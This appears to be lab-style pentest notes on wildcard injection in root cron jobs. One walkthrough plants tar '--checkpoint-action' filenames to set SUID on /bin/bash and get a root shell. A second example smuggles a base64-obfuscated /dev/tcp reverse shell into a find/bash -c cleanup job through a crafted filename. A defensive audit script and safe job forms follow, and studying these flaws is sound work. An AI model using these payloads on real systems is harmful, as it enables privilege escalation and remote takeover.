# Wildcard Injection

If a command calls for a wildcard, we may be able to inject a command instead. An example of such a command:

`tar -cf /opt/backups/website.tar *`

From OffSec

With the cron backup script and our write access to the webroot, we can trick the `tar` command into running arbitrary commands as root using a wildcard injection. This works by using the `--checkpoint` and `--checkpoint-action` flags accepted by `tar`. If we create files in the webroot with names that are arguments for the `tar` command, they will be interpreted as arguments instead of filenames.

First, let's move into the webroot and create a file on the target named **exploit.sh** with a simple command to set SUID on **/bin/bash**.

```
<site-editor/editor/extensions/pagebuilder/includes$ cd /var/www/html
cd /var/www/html
alice@readys:/var/www/html$ echo "chmod +s /bin/bash" > exploit.sh
echo "chmod +s /bin/bash" > exploit.sh
alice@readys:/var/www/html$ 
```

We then create two empty files using `touch`. The first will cause `tar` to cause a checkpoint on every file and the second will tell `tar` to execute our **exploit.sh** with `bash` on every checkpoint.

```
alice@readys:/var/www/html$ touch ./"--checkpoint=1"
touch ./"--checkpoint=1"
alice@readys:/var/www/html$ touch ./"--checkpoint-action=exec=bash exploit.sh"
touch ./"--checkpoint-action=exec=bash exploit.sh"
```

After a few minutes, we check if the cron job has run and if SUID is set on **/bin/bash**.

```
alice@readys:/var/www/html$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash
alice@readys:/var/www/html$ 
```

We can now execute `bash` with SUID to gain a root shell on the target.

```
alice@readys:/var/www/html$ /bin/bash -p
/bin/bash -p
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
whoami
root
```

## Example 2

```
/etc/cron.d/wpclean:*/5 * * * * root /usr/bin/find . -type f -not -regex '.*\.\(jpg\|jpegcd /\|png\|gif\)' -exec bash -c "rm -f {}"
```

The command above is run by root every 5 minutes. We want to insert ourselves into the command to get a root reverse shell. I went to the folder in question (wp uploads) and created a file with:

```
touch ./"file.exe; echo c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40OS4yMjMvODg4OCAwPiYx | base64 -d | bash"
```

I set my listener like normal and once the 5 minutes were done, the command ran and toward the end essentially it ran `rm -f file.exe; echo c2ggLWkgPi....` giving me root on the reverse shell.
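
From the defender's side, both the `tar` walkthrough and Example 2 come down to a privileged job letting filenames become options or shell text. The script below is an added example, not part of the original page or the OffSec walkthrough: it audits a directory for such names and shows option-safe forms of the two jobs. The function names, the `MARKER` stand-in filenames, the sample directory and the extension list are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: not from the original page. Function names, the MARKER
# stand-in filenames and the sample directory are constructed for illustration.

# Print "kind<TAB>name" for each entry of DIR that a privileged job could misread.
audit_names() (
    cd -- "$1" || exit 2
    for name in * .[!.]*; do
        [ -e "./$name" ] || [ -L "./$name" ] || continue   # glob matched nothing
        case $name in
            -*) printf 'option-like\t%s\n' "$name" ;;       # a flag once * expands
            *';'*|*'|'*|*'&'*|*'$'*|*'`'*|*'('*|*'<'*|*'>'*)
                printf 'shell-meta\t%s\n' "$name" ;;        # code inside bash -c "... {}"
        esac
    done
)

# Backup job: ./* makes every expanded name start with "./", never with "-".
# ARCHIVE must be an absolute path because the function changes directory.
safe_backup() (
    cd -- "$2" && tar -cf "$1" ./*
)

# Cleanup job: no bash -c; find passes each path to rm as a single argument.
# Extension list assumed from the page's regex (jpg, jpeg, png, gif).
safe_clean() {
    find "$1" -type f ! -name '*.jpg' ! -name '*.jpeg' ! -name '*.png' \
        ! -name '*.gif' -exec rm -f -- {} +
}

# Constructed sample directory with the filename shapes used on this page.
make_sample() (
    d=$(mktemp -d) || exit 1
    : > "$d/index.php"; : > "$d/photo.jpg"
    : > "$d/--checkpoint=1"
    : > "$d/--checkpoint-action=exec=touch MARKER"
    : > "$d/file.exe; touch MARKER"
    printf '%s\n' "$d"
)

sample=$(make_sample)
audit_names "$sample"                                   # flags three of five names
safe_backup "$sample.tar" "$sample" && tar -tf "$sample.tar"
safe_clean "$sample" && ls -A "$sample"                 # only photo.jpg is left
rm -rf "$sample" "$sample.tar"
```
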

